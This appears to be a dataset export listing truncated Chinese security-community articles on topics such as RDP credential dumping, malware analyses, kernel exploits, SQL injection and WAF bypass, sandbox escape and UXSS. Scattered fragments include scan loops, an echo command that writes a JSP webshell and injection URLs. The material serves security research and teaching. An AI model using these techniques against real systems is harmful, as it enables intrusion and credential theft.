text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
## 转储RDP凭据
> 本文为翻译文章,原文链接:<https://pentestlab.blog/2021/05/24/dumping-rdp-credentials/>
管理员通常使用远程桌面协议(RDP)来远程管理Windows环境。同时它也是系统会开启的标准的RDP,来作为允许用户访问其他网络的跳转站。然而,尽管该协议长时间被广泛使用,却并没有得到加固或适当的监视。
从红队角度来说,转储lsass进程的凭据,可能会导致横向移动来穿越网络,或者如果获取到域管理员账户的凭据则直接导致整个域被接管。与RDP协议相关的进程也存在于红队收集凭证的范围内。这些进程是:
* 1.svchost.exe
* 2.mstsc.exe... | 社区文章 |
# 恶意软件Anubis再次通过官方应用商店进行传播
##### 译文声明
本文是翻译文章,文章来源:securityintelligence.com
原文地址:<https://securityintelligence.com/anubis-strikes-again-mobile-malware-continues-to-plague-users-in-official-app-stores/>
译文仅供参考,具体内容表达以及含义原文为准。
IBM X-Force移动恶意软件研究人员观察到一些开发者正积极地将Android恶意软件下载器上传到Google Play商店中。
自从发生了[持续针对Google Play广告的系列攻... | 社区文章 |
最近针对区块链的“币圈”进行了一个小范围的资料阅读与研究,学习总结了一些安全方面的知识。通过对“币圈”发生的一些重大安全事件的研究,我也接触了许多“激励层”方面的知识。希望将内容简单的总结于此。
通过这几个月的对区块链知识的学习,我提炼前人的话简单的对区块链进行总结——简单来说区块链为 **“去中心化”** + **“Token机制”**
的结合。而去中心化我们在这里先不谈,我们就主要讨论下这个Token机制(激励机制)中蕴含的思想。
下面,我将从比特币、以太币入手,并引出与激励层相关的安全攻击—Race To Empty。
### 一、激励机制的价值体现
区块链本质是分布式共识与价值激励相结合的产物,它一个方面通过密码学等数学运算... | 社区文章 |
## 前言
最近一直在挖各大SRC厂商的逻辑漏洞,以前听别人说过有些支付漏洞因为其业务流程的原因,会被厂商忽略,没想到自己竟然也遇到了相同的事情2333,接下来我将详细介绍挖洞过程和忽略原因。
## 挖洞过程
### 梅开一度
首先进入某网站,注册一个账号。关于注册方面的逻辑漏洞,似乎前辈们已经挖的渣都不剩了,经过一通测试,只能选择放弃。由于这是一个购买服务类型的网站,结下来要测试的逻辑漏洞当然就是支付漏洞。
我任意输入了一些关键词进行搜索,选择了一个价值7000的商品,点击进入购买。
进入商品后,点击购买,进入购买界面。
点击下单,使用Burp Suite进行抓包
在抓包的过程中看到了一个关于`amount=7000&orderA... | 社区文章 |
# 警惕!GandCrab V 5.2正在利用恐吓主题钓鱼邮件进行传播
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
近期,360威胁情报中心捕获到一起针对中文使用者的钓鱼邮件。该邮件带有一个压缩包,经分析发现,该压缩包内为最新的GandCrab
5.2勒索软件。基于该线索,360威胁情报中心对GandCrab勒索软件最新变种的IOC,攻击技术和传播方式进行分析汇总,并提出了一些解决方案,以供读者参考。
## 攻击分析
本次攻击的邮件内容如下所示
邮件标题为“你必须在3月11日下午3点向警察局报到!”
发件人邮箱为:[Jae-hyun@idabostian.com](mailto:J... | 社区文章 |
# ctf中php的一些trick
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
获取http请求的变量值过程
对于php获取http请求的值的变量`$_GET,$_POST,$_COOKIE,$_SERVER,$_ENV,$_REQUEST,$_FILES`,在初始化请求时就注册了这么多的超全局变量
,这里从php的源代码就可以看出:
在看看php的官方文档怎么说
这里重点关照一下`$_REQUEST`,明明写的默认是包含`$_GET,$_POST 和
$_COOKIE`的数组,但是实际上却是只包含了`$_GET,$_POST`
`<?php
var_dump($_GET);
var... | 社区文章 |
**本文翻译自:[CVE-2017-11176: A step-by-step Linux Kernel exploitation (part
2/4)](https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part2.html)**
# Introduction
在[前面的文章](https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part1.html)中对CVE-2017-11176漏洞进行了详细分析并提出了一个攻击场景。
通过在内核空间强制触发漏洞来验证漏洞的可达性(在System... | 社区文章 |
## 前言
前几天去打了Defcon
China决赛,差两题就可能拿到外卡。作为Web手0题滚粗难辞其咎,回来重新看了这道比赛时绕了一下午的secret_house,然后结合赛后拿到的几个payload,写一写Sandbox
hook toString以后的一些绕过思路。
## 情景介绍
第一次遇到Sandbox hook toString 是去年google ctf决赛的Blind XSS。当时的限制比较简单,代码如下
Function.prototype.toString = function() {
return '[No source code for you. Not on my watch, no... | 社区文章 |
# 【技术分享】Edge浏览器上的SOP绕过/UXSS(含演示视频)
|
##### 译文声明
本文是翻译文章,文章来源:brokenbrowser.com
原文地址:<https://www.brokenbrowser.com/sop-bypass-uxss-tweeting-like-charles-darwin/>
译文仅供参考,具体内容表达以及含义原文为准。
****
****
翻译:[ **興趣使然的小胃**](http://bobao.360.cn/member/contribute?uid=2819002922)
预估稿费:200RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**
*... | 社区文章 |
## 0x01 前言
因为一直想要学习反序列化相关的内容,并且从反序列化延伸出来学习内存马,所以花了很大一部分精力,从CC1到CB,整体地过了一遍反序列化利用链。在学习过程中,发现一个很有意思的内存马,WebSocket内存马,感觉如果用的好的话,挺符合实际需要的,所以自己大体利用了一下,很成功,在这里整理分享出来。
## 0x02 环境准备
代码分析工具idea
shiro反序列化靶场(Tomcat):<https://github.com/yyhuni/shiroMemshell>
BurpSuite抓包工具
Websocket内存马相关代码
wscat工具(npm install -g wscat)
## 0x... | 社区文章 |
**作者:启明星辰ADLab
原文链接:<https://mp.weixin.qq.com/s/1a5Isz6KPtWuO9SQkiuGXw>**
### 背景
近日,纽约大学阿布扎比分校的安全研究员Mathy Vanhoef发现了一系列影响巨大的Wi-Fi漏洞,这一系列漏洞被统称为FragAttacks,FragAttacks影响了1997年Wi-Fi技术诞生以来的所有Wi-Fi设备(包括计算机、智能手机、园区网络、家庭路由器、智能家居设备、智能汽车、物联网等等)。
其中三个漏洞影响大多数WiFi设备,属于Wi-Fi 802.11标准帧聚合和帧分片功能中的设计缺陷,而其他漏洞是Wi-Fi产品中的编程错误。
黑客只要在目标设备的... | 社区文章 |
# 【技术分享】iOS版微信处理GIF表情不当导致闪退分析
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
****
****
作者:[ **shrek_wzw@360 Nirvan
Team**](http://bobao.360.cn/member/contribute?uid=2577449118)
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**一、 背景情况**
5月17日起,在各个微信群中流传着一个天线宝宝的GIF表情。在iOS版的微信上,只要打开了包含这个GIF表情的聊天窗口,就会造成微信闪退。
在进行具体分析之前,对崩溃原因进行了猜测... | 社区文章 |
# php代码审计学习之函数缺陷
**感兴趣的可以参考一下**[PHP-Audit-Labs](https://github.com/hongriSec/PHP-Audit-Labs)
## in_array函数缺陷
### Wish List
* Code
class Challenge {
const UPLOAD_DIRECTORY = './solutions/';
private $file;
private $whitelist;
public function __construct($file) {
$this->file = $file;
... | 社区文章 |
# TL;DR
* Definition - What does Persistence mean?
Persistence refers to object and process characteristics that continue to
exist even after the process that created it ceases or the machine it is
running on is powered off. When an object or state is created and needs to be
persistent, it is saved in a non-volatil... | 社区文章 |
# 【技术分享】机器学习在恶意软件检测中的应用
|
##### 译文声明
本文是翻译文章,文章来源:infosecinstitute.com
原文地址:<http://resources.infosecinstitute.com/machine-learning-malware-detection/>
译文仅供参考,具体内容表达以及含义原文为准。
****
翻译:[興趣使然的小胃](http://bobao.360.cn/member/contribute?uid=2819002922)
预估稿费:200RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**
**
**一、前言**
机器学习是计算机科... | 社区文章 |
# 内核模式威胁的最新技术与防御方式(第三部分)
|
##### 译文声明
本文是翻译文章,文章来源:endgame.com
原文地址:<https://www.endgame.com/blog/technical-blog/kernel-mode-threats-practical-defenses-part-2>
译文仅供参考,具体内容表达以及含义原文为准。
## 传送门
内核模式威胁的最新技术与防御方式(第一部分)
<https://www.anquanke.com/post/id/160412>
内核模式威胁的最新技术与防御方式(第二部分)
<https://www.anquanke.com/post/id/1606... | 社区文章 |
**作者:启明星辰ADLab**
**原文链接:<https://mp.weixin.qq.com/s/ohMZkfyS_B_HVg3Xm0THbQ>**
## 一、漏洞背景
2020年3月,谷歌修补了一个存在于联发科芯片中的安全漏洞(CVE-2020-0069),漏洞影响20余款联发科芯片和数百万Android设备。该漏洞存在于MediaTek
Command Queue驱动(CMDQ命令队列驱动),允许本地攻击者实现对物理内存地址的任意读写,从而导致权限提升。
## 二、受影响国产手机型号
* Huawei GR3 TAG-L21
* Huawei Y5II
* Huawei Y6II MT6735 series... | 社区文章 |
很早之前发现的漏洞,整体都比较有趣,分享出来一下
**漏洞危害**
dedecms开启会员中心注册功能,即可完成管理员密码重置
**漏洞成因**
利用两个漏洞即可完成管理员重置:
dedecms前台用户任意密码重置
dedecms前台任意用户登录
第一个漏洞就是最近爆出的dedecms前台漏洞,单一危害挺有限,此处不做分析
大家可以参考下[lemon](http://www.cnblogs.com/iamstudy/articles/dedecms_old_version_method.html
"lemon")的文章
上面文章能重置管理员密码是由于:
1、前台重置dede_member的admin密码
... | 社区文章 |
# 【技术分享】安卓新型恶意木马Xavier的发展过程和技术分析
|
##### 译文声明
本文是翻译文章,文章来源:blog.trendmicro.com
原文地址:<http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-xavier-information-stealing-ad-library-android/>
译文仅供参考,具体内容表达以及含义原文为准。
译者:[eridanus96](http://bobao.360.cn/member/contribute?uid=749283137)
预估稿费:160RMB
投稿方式:发送邮件至lin... | 社区文章 |
# Claymore Dual Miner远程命令执行漏洞
|
##### 译文声明
本文是翻译文章,文章来源:https://reversebrain.github.io/
原文地址:<https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/>
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
大家好,今天我将向您展示如何在由nanopool开发的流行Claymore Dual Miner上找到远程执行代码漏洞。
您可以从
<https://github.com/nanopool/Claymore-Dua... | 社区文章 |
# McAfee中的SiteList.xml配置文件能扩大活动目录域的权限
|
##### 译文声明
本文是翻译文章,文章来源:360安全播报
原文地址:<https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md>
译文仅供参考,具体内容表达以及含义原文为准。
在做测试员的实习工作期间,我找到了一个很棒的方法,可以在Active Directory
域(活动目录域)中实现privesc脚本。我借用了一名员工的笔记本电脑和他的低权限的McAfee帐号,准备来实现这一功能。在这台笔记本上装有McAfee
Virusscan Enterprise 8.8版本软件。... | 社区文章 |
# Pentesting 备忘录
## 情报侦查
### 从nmap里面提取出实时存活的IP
nmap 10.1.1.1 --open -oG scan-results; cat scan-results | grep "/open" | cut -d " " -f 2 > exposed-services-ips
### 简单的端口扫描
for x in 7000 8000 9000; do nmap -Pn –host_timeout 201 –max-retries 0 -p $x 1.1.1.1; done
### DNS lookups, Zone Transfers & Brute-Force
w... | 社区文章 |
* * *
## Web安全系列 -- XSS前端漏洞
### 前言
这是渗透测试方面的第一课,我们跳过了社工技术的讲解,在之前的课程讲解中已经为大家介绍了社工技术的基本方法,对于社工,我们要做的就是足够细心和耐心,尽可能的收集可利用的信息,说起来很简单,但真正落到实际操作上就需要大家付出大量的时间和精力了。
### 前端漏洞
随着WEB应用越来越复杂,用户对WEB安全也越来越重视。再加上前端工程师的工作面已逐渐扩大,开始覆盖到各种业务逻辑,因此如何应对各种WEB安全问题就显得十分重要。现在危害比较大的前端漏洞主要有xss跨站脚本漏洞,csrf跨站请求伪造漏洞,网上大量的前端攻击行为都是基于这两种漏洞上形成的。今天我们就来介绍下xs... | 社区文章 |
## 0x01 littlenote
保护全开的堆利用程序,有add、show、delete功能,delete模块有UAF漏洞。
add: 只能申请size为0x71或0x31的堆块
show: 显示堆块内容
delete: 存在UAF
攻击思路:
1.利用UAF,删除堆块,再读取数据,泄漏heap地址
2.再次利用UAF漏洞,将fd指针篡改到某堆块中间,就能继续输入数据改写下一个相邻chunk的size,把size改大,然后free,就能使其进入unsortedbin,从而泄漏libc地址
3.第三次利用UAF做double free,向malloc_hook填入one_gadget地址
exp:
... | 社区文章 |
# 环境搭建
* `composer create-project --prefer-dist laravel/laravel laravel58` 安装 Laravel 5.8 并生成 `laravel58` 项目
* 进入项目文件夹,使用 `php artisan serve` 启动 web 服务
* 在 `laravel58/routes/web.php` 文件添加路由
Route::get("/","\App\Http\Controllers\DemoController@demo");
* 在 `laravel58/app/Http/Controllers/` 下添加 `DemoContro... | 社区文章 |
Windows下关于进程的注入方法有很多
有几种通用性较强像APC注入和KernelCallbackTable注入。这里结合了实际参考了github代码和一些优化的项目来将其实现,然后更好的理解学习一下这两种注入的方式和它们的可操作性。
**APC Code Injection**
首先来介绍一下APC APC注入 和实现的过程中一些细节的地方,比如枚举线程,用户态内核态APC的区别等这样方便更好的理解APC
注入的实现原理和后续改进等。
Windows内核态使用APC来完成异步启动的I/O操作,线程挂起等行为
APC是(Asynchronous Procedure Call)指异步过程调用
APC是允许用户程序... | 社区文章 |
> Author:darkyantou@5ecurity.cn
> 原文链接:<http://www.5ecurity.cn/index.php/archives/137/>
我们有时候会遇到存在命令执行漏洞的网站,我们想写入一句话或者jsp大马。
偶尔运气比较背,或者策略比较严会出现以下两种情况:
1. `wget` 命令不存在
2. 禁止 **从外网下载** 东西
这是我们可能想要通过`echo` 来 **写一个木马文件**
echo neirong > /目录/360.jsp
问题来了 小马或者大马存在各种特殊字符需要转义输出文件中内容各种报错不解析等等
这时候我们可以利用`base64`编码再解... | 社区文章 |
# 前尘——与君再忆CC链
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
每次提到Java反序列化,我始终都能在脑海中浮现commons-collections,这一个能助开发从业者轻松开发的依赖,使人爱也萧何恨也萧何。今日与君再忆,望与君温故而知新。
## 序列化
### 定义
**序列化:** Java
提供了一种对象序列化的机制,该机制中,一个对象可以被表示为一个字节序列,该字节序列包括该对象的数据、有关对象的类型的信息和存储在对象中数据的类型.
**反序列化:**
将序列化对象写入文件之后,可以从文件中读取出来,并且对它进行反序列化,也就是说,对象的类型信息、对象的... | 社区文章 |
## 文章前言
本篇文章主要介绍几个关于Jackson-databind的CVE漏洞,并对此进行简易分析~
## CVE-2020-14060
### 影响范围
* jackson-databind before 2.9.10.4
* jackson-databind before 2.8.11.6
* jackson-databind before 2.7.9.7
### 利用条件
* 开启enableDefaultTyping()
* 使用了org.apache.drill.exec:drill-jdbc-all第三方依赖
### 漏洞复现
pom.xml
<dependencies>
... | 社区文章 |
# 一、前言
如题,由于是在已知有一处sql注入的情况下才接手进行的后续操作,因此前面信息搜集则一笔带过。
# 二、信息搜集
目标是个本地的传销站点其大致信息为IIS+ASP.NET+安全狗、腾讯云。
# 三、Bypass Sql
## 3.1 Fuzz
空格 error
加号 未拦截
等号 error
单引号 error
双引号 未拦截
双括号 未拦截
+select error
%0bselect 未拦截
%0bselect%0buser%0bfrom 未拦截
%0bselect%0b... | 社区文章 |
原文:[brokenbrowser](https://www.brokenbrowser.com/microsoft-edge-detecting-installed-extensions/)
原作者:[Manuel Caballero](https://twitter.com/magicmac2000)
译: **Holic (知道创宇404安全实验室)**
攻击者喜欢收集受害者的指纹特征。我们之前已经见识了两种技术,坏人可以通过检测特定文件(来逃避分析人员),甚至可以获取特定关联应用的名称。Microsoft
修补了诸如此类的特性,而今天我们会看到如何在 Edge 上检测安装的浏览器扩展程序。
另外,如此精彩的研究和 P... | 社区文章 |
**作者:深信服千里目安全实验室
原文链接:<https://mp.weixin.qq.com/s/Kkta59k7r81uIBjJvE9pCw>**
## 1.概述
"SideWinder(响尾蛇)"APT组织被认为是一个活跃于南亚地区的APT攻击组织,该组织的主要攻击目标是军事,国防等行业。针对的国家包括巴基斯坦,阿富汗,中国,孟加拉,尼泊尔等国家。该组织最早在卡巴斯基在2018年的第一季度报告中被提及,卡巴斯基声称该组织从2012年就开始活跃,但是关于该组织的技术细节没有公开。值得一提的是,卡巴斯基此后再也没有涉及该组织的相关报告。一些安全厂商根据卡巴斯基的季度报告提到的内容将一些类似的攻击归因于"SideWinder(响... | 社区文章 |
# 2019 虎鲸杯电子取证大赛赛后复盘总结
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
前几天参加了一个电子取证大赛,题目模拟了一起黑客入侵窃取服务器信息的案件,在整个案件中如果通过线索的搜集把各个蛛丝马迹都串起来,还是挺有趣的。赛后对案件进行了复盘,案件描述如下:
从线索来看这里应该是 a 和 e 的犯罪嫌疑比较大。
所给的取证材料有这些:
接下来就要通过这些检材的镜像/数据来进行相关的信息取证。这里对证据逐个来进行分析。
## APK 逆向分析(管理员手机上木马文件)
使用 jadx-gui 把木马文件加载进去直接读 java 代码,发现是用 okhttp 框架写的程序, ... | 社区文章 |
# Windows服务器下勒索木马的防护与对抗
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 摘要
去年的WannCry勒索病毒,让全社会都关注到了这类新生的恶意软件。从去年下半年开始,勒索病毒在国内的攻击重点开始转向了各类服务器,尤其以windows服务器为甚。黑客利用弱口令和各类系统漏洞,软件漏洞向服务器远程渗透投毒,经常出现一个服务集群多台主机被感染的情况,造成的影响轻则服务中断,有严重的更影响到整个公司的运营,已经成为影响企业安全的一大问题。
## 趋势与拦截数据
针对服务器的爆破攻击,一直是服务器主机面临的一大类安全风险,我们对过去近两个月来的爆破攻击拦截量进行了统计,虽然从数据... | 社区文章 |
# 【技术分享】基于API调用的恶意软件分析技术
|
##### 译文声明
本文是翻译文章,文章来源:blog.malwarebytes.com
原文地址:<https://blog.malwarebytes.com/threat-analysis/2017/10/analyzing-malware-by-api-calls/>
译文仅供参考,具体内容表达以及含义原文为准。
****
****
译者:[shan66](http://bobao.360.cn/member/contribute?uid=2522399780)
预估稿费:170RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**基于API的... | 社区文章 |
所以想来先知社区和大家共同讨论 共同提高 以后我会继续秉承共享 免费的精神与大家共同学习
下面附上主要源码以及完整项目文件 代码渣 大牛勿喷 多多指点小弟
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.IO;
using System.Net;
using System.Text;
using System.Text.RegularExpressio... | 社区文章 |
sqlmap在默认的的情况下除了使用char()函数防止出现单引号,没有对注入的数据进行修改,还可以使用--tamper参数对数据做修改来绕过waf等设备。
### 0x01 命令如下
sqlmap -u [url] --tamper [模块名]
sqlmap的绕过脚本在目录`usr/share/golismero/tools/sqlmap/tamper`下
目前sqlmap 1.2.9版本共有37个
可以使用`--identify-waf`对一些网站是否有安全防护进行试探
### 0x02 常用tamper脚本
#### **apostrophemask.py**
适用数据库:ALL
作用:将引号替换为utf-... | 社区文章 |
# 安全快讯7 | Office 365用户成为新的网络钓鱼目标
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 诈骗先知
### **微博莫名点赞色情内容,** **可账号密码明明没有被盗**
近日,有用户反馈在使用新浪微博时,发现自己的 **点赞记录里出现了很多非本人操作的异常点赞。**
点赞对象既有大V和公共机构,也有营销号,内容则涉及明星、综艺、私家侦探广告等等,甚至还包括一些露骨的淫秽色情内容。
寻迹发现,近些年有过类似遭遇的网友数不胜数,异常点赞大量集中在代购、修眉、丰胸、减肥、婚纱照等广告贴,以及关于明星的营销内容。而且,
**这些微博还有一个特点,虽然点赞数都在几千以上,但... | 社区文章 |
# 2021西湖论剑pwn、re WP
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
这是2021西湖论剑的部分pwn和re题目,题目有一定难度,但也有相对简单的题目,对以下几道题目进行复盘总结。
## PWN -> string_go
### 题目分析
本题模仿pythonIDE使用C++编写的一个计算器,采用ptr下标溢出导致覆盖string结构的size字段来泄露栈内地址.
保护全开,ida分析主函数如下:
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
... | 社区文章 |
文前先感谢大家的支持,上篇[Oracle数据库注入总结](https://xz.aliyun.com/t/9940)想着后续学习一下如何进行利用,getshell的,奈何技术还太菜了,再加上项目压力大,所以就慢慢搁置了。这里先出一篇bypass的,文中仅针对Oracle数据库,但是bypass手法我认为万变不离其宗,思想上是通用的,希望能够对大家有所帮助。
## 0x01 环境准备
### 一、安装Oracle数据库
1、首先下载数据库安装软件
具体可以从参考这里,我是从他的百度云下载的
<https://blog.csdn.net/qq_32786873/article/details/81187208>
2、点击se... | 社区文章 |
参考:<https://medium.com/@dPhoeniixx/vimeo-upload-function-ssrf-7466d8630437>
## 前言
前段时间hackerone上披露了一个Vimeo上的ssrf漏洞,原作者在medium上发表了上述的博文。我结合博文对这个漏洞进行了复现的尝试。这个漏洞主要利用了Vimeo支持云上传视频的功能。它在从云端请求视频时是通过文件链接直接拉取的,且没有对域名做校验。同时,为了支持大视频的上传,采用了断点续传的方式进行,在实现断点续传上存在响应302跳转的问题继而导致了有回显的SSRF。
## 断点续传
HTTP1.1协议(RFC
2616)开始支持获取文件的部分内容,这为并行下... | 社区文章 |
# Drupalgeddon的客户端攻击分析
##### 译文声明
本文是翻译文章,文章来源:blog.malwarebytes.com
原文地址:<https://blog.malwarebytes.com/threat-analysis/2018/05/look-drupalgeddon-client-side-attacks/>
译文仅供参考,具体内容表达以及含义原文为准。
## 写在前面的话
Drupal是最欢迎的内容管理系统(CMS)之一,其他还有WordPress和Joomla。在2018年3月下旬,Drupal受到了一个主要的远程代码执行漏洞((CVE-2018-7600]([https://www.drupal.or... | 社区文章 |
# 将root CA添加到iOS设备
|
##### 译文声明
本文是翻译文章,文章来源:360安全播报
原文地址:<https://www.sensepost.com/blog/2016/too-easy-adding-root-cas-to-ios-devices/>
译文仅供参考,具体内容表达以及含义原文为准。
关于最近约翰•霍普金斯团队遇到的iMessage加密错误,有几个人指出,这个时候就需要添加一个root CA来使它正常运作。然而获得一个全球性root
CA的私有密钥是很困难的,让一台设备信任一个恶意的root CA看上去也很难办到,但实际上不然。(在文章尾部的注意事项中有一个简短的技术说明。)
在2014 年的Def... | 社区文章 |
Python的沙箱逃逸是一些OJ,Quantor网站渗透测试的重要渠道,本篇文章主要从一些语言特性和一些技巧上来讲解python的一些元知识以及如何突破限制达到我们渗透的目的
# 0x00 python沙箱逃逸概述
沙箱逃逸,就是在给我们的一个代码执行环境下(Oj或使用socat生成的交互式终端),脱离种种过滤和限制,最终成功拿到shell权限的过程
对于python的沙箱逃逸而言,我们来实现目的的最终想法有以下几个
* 使用os包中的popen,system两个函数来直接执行shell
* 使用commands模块中的方法
* 使用subprocess
* 使用写文件到指定位置,再使用其他辅助手段
总体来说,我... | 社区文章 |
近一段时间,千里目安全实验室EDR安全团队持续收到大量企业用户反馈,其内网很多服务器存在卡顿和外联异常IP等现象。经过我们深入挖掘,发现这是利用WMI+Powershell方式实现的无文件攻击行为,其目的是长驻内存挖矿。由于此攻击没有本地落地文件,难以察觉,企业利益默默受到侵害。
此流行病毒,除了具备无文件攻击等高级攻击特性,还内置两种横向传染机制,分别为Mimikatz+WMIExec自动化爆破和MS17-010“永恒之蓝”漏洞攻击,堪称火力全开,极易在局域网内迅猛扩散。
**0x01 攻击场景**
此次攻击,具备无文件攻击特性,所有模块功能均加载到内存中执行,没有本地落地文件。为了迅速在内网传播,采用了SMB弱口令爆破攻击和“永... | 社区文章 |
# 蚁剑客户端RCE挖掘过程及源码分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
Author:evoA[@Syclover](https://github.com/Syclover "@Syclover")
## 前言:
事情的起因是因为在一次面试中,面试官在提到我的CVE的时候说了我的CVE质量不高。简历里那几个CVE都是大一水过来的,之后也没有挖CVE更别说高质量的,所以那天晚上在我寻思对哪个CMS下手挖点高质量CVE的时候,我盯上了蚁剑并挖掘到了一枚RCE,虽然漏洞的水平并不高但是思路和过程我觉得值得拿来分享一下。
## Electron
Electron是由Github开发,用H... | 社区文章 |
# Blackhat2016第二天部分精彩议题介绍(含PPT下载)
|
##### 译文声明
本文是翻译文章,文章来源:360安全播报
译文仅供参考,具体内容表达以及含义原文为准。
blackhat usa 2016第二天的议题
想下载PPT的来这里
官方下载地址:<https://www.blackhat.com/us-16/briefings.html>
国内镜像地址:<http://yunpan.cn/c6egtYI6ceHbQ> (提取码:f816)
**议题: WINDOWS 10 MITIGATION IMPROVEMENTS (Windows 10的利用缓解的改善)**
演讲者的照片和介绍
演讲内容:
在过去10年里,... | 社区文章 |
## 前言:
事情是这样的,由于我 CNVD 还差一积分就可以兑换京东E卡了,所以找了这个 CMS 看看能不能挖到漏洞,运气还是不错的挖到了两个,分别是 SSRF
与文件覆盖 GETSHELL,这才有这篇文章。该 CMS 版本是 4.2。以下漏洞均被 CNVD 收录。
## 环境说明:
PHP版本用 7.0.9 就好了。
## SSRF:
根据功能点定向审计,在后台的工具栏有一个采集功能,根据经验这种功能一般存在 SSRF。
使用 python3 在本地开启简易的 http 服务。
点击下一步,果不其然存在 SSRF。
进行漏洞分析。
根据 burpsuite 抓到的请求包很容易定位到代码位置。
在文件 up... | 社区文章 |
# Java安全之Thymeleaf SSTI分析
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## About Thymeleaf
Thymeleaf是SpringBoot中的一个模版引擎,个人认为有点类似于Python中的Jinja2,负责渲染前端页面。
之前写JavaWeb和SSM的时候,前端页面可能会用JSP写,但是因为之前项目都是war包部署,而SpringBoot都是jar包且内嵌tomcat,所以是不支持解析jsp文件的。但是如果是编写纯静态的html就很不方便,那么这时候就需要一个模版引擎类似于Jinja2可以通过表达式帮我们把动态的变量渲染到前端页面,我们只需要写一个te... | 社区文章 |
# 【技术分享】Windows下的渗透测试之提权的基本套路(下)
|
##### 译文声明
本文是翻译文章,文章来源:fuzzysecurity
原文地址:<http://www.fuzzysecurity.com/tutorials/16.html>
译文仅供参考,具体内容表达以及含义原文为准。
****
**翻译:[ **慕容禽兽**](http://bobao.360.cn/member/contribute?uid=2667655202)**
**稿费:200RMB(不服你也来投稿啊!)**
**投稿方式:发送邮件至linwei#360.cn,或登陆 ** **[
**网页版**](http://bobao.360.cn/c... | 社区文章 |
# MSSQL数据库注入全方位利用
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x01 前言
在渗透测试过程中遇到了MSSQL数据库,市面上也有一些文章,不过大多数讲述的都是如何快速利用注入漏洞getshell的,对于MSSQL数据库的注入漏洞没有很详细地描述。在这里我查阅了很多资料,希望在渗透测试过程中遇到了MSSQL数据库能够相对友好地进行渗透测试,文章针对实战性教学,在概念描述方面有不懂的还请自行百度,谢谢大家~
## 0x02 注入前准备
### 1、确定注入点
http://219.153.49.228:40574/new_list.asp?id=2 and 1... | 社区文章 |
# 十分钟学会恶意样本分析,一眼看透无所遁形
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 一、关于恶意软件
**恶意软件** 是尝试破坏计算机、搜集敏感信息或者非法访问其他计算机的软件, 它对个人隐私信息、商业机密甚至是国家安全都会造成很大的威胁。
2017年WannaCry勒索病毒的爆发,是迄今为止最严重的勒索病毒事件,至少150个国家、30万名用户中招,造成损失达80亿美元;Conficker蠕虫病毒感染数千万台电脑,史上袭击范围最广的Conficker蠕虫病毒曾感染了全球200多个国家的数千万台Windows个人电脑。
**本期“安仔课堂”,ISEC实验室吴老师跟大家一起针对恶意软... | 社区文章 |
**作者:gaoya@360高级攻防实验室
原文链接:<http://noahblog.360.cn/f5-rce-in-wild-investigation/>**
[F5 Networks官方](https://support.f5.com/csp/article/K52145254)在7月1日公布了BIG-IP系统的TMUI接口中存在一个严重的远程代码执行漏洞(CVE-2020-5902)。利用此漏洞的攻击层出不穷,我们对这些事件进行了总结,以期对近日来的事件进行完整阐述。
## 漏洞简述
该漏洞允许未授权的远程攻击者通过向漏洞页面发送特殊构造的数据包,在系统上执行任意系统命令、创建或删除文件、禁用服务等。
根据360安全... | 社区文章 |
作者: [xfkxfk@逢魔安全实验室](https://mp.weixin.qq.com/s/9vk-H36erencugdYca9qXA
"xfkxfk@逢魔安全实验室")
#### 01 背景介绍
SSRF(Server-Side Request Forgery)服务端请求伪造,是一种由攻击者构造形成由服务器端发起请求的一个漏洞,一般情况下,SSRF
攻击的目标是从外网无法访问的内部系统。
在互联网上已经很多介绍SSRF漏洞的原理,漏洞场景,漏洞利用方法的文章,但是大多数的SSRF漏洞利用都是内网扫描,内网服务识别,内网漏洞盲打,写计划任务获取shell,写私钥获取shell,利用SSRF漏洞结合Gohper或者Dict协议攻... | 社区文章 |
作者:云鼎实验室
2018年上半年 DDoS 攻防仍如火如荼发展,以 IoT 设备为反射点的 SSDP 反射放大尚未平息,Memcached DDoS
又异军突起,以最高可达5万的反射放大倍数、峰值可达1.7 Tbps 的攻击流量成为安全界关注的新焦点[1]。DDoS
这一互联网公敌,在各种防御设备围追堵截的情况下,攻击者夜以继日地钻研对抗方法、研究新的攻击方式;而且往平台化、自动化的方向发展,不断增强攻击能力。腾讯安全云鼎实验室主要从2018年上半年
DDoS 攻击情况的全局统计、DDoS 黑色产业链条中的人员分工与自动化操作演进两个方面进行分析阐述。
此外,就目前企业用户面临的严峻的 DDoS 攻击威胁,腾讯云也提出了大禹 GD... | 社区文章 |
作者:[bird@TSRC](https://security.tencent.com/index.php/blog/msg/120)
#### 1\. 前言
近日,Xshell
官方发布[公告](https://www.netsarang.com/news/security_exploit_in_july_18_2017_build.html)称其软件中存在后门。我们的实习生同学对该后门进行了详细的分析,确认这是一个具备恶意代码下载执行和数据回传等能力的高级木马。
